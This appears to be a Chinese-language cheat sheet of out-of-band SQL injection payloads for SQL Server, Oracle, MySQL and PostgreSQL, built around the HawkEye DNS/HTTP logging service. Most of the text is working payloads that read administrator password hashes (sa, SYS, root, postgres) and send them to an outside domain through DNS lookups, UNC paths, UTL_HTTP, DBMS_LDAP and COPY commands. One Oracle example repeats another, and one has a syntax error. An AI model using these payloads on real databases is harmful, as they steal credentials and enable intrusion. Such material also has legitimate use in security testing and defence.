HawkEye Log/Dns 在Sql注入中的应用
Hawkeye: http://hawkeye.hackinglab.cn/
支持的数据库类型
- SQL Server
- Mysql
- Oracl
- PostgresSQL
注入姿势
SQL Server
Example:
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.s.livesina.com';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');
Oracle
Example1:
SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');
Example2:
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example3:
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example4:
SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;
Example5:
SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;
Example6:
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;
Mysql
Exmaple:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));
PostgreSQL
Example:
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();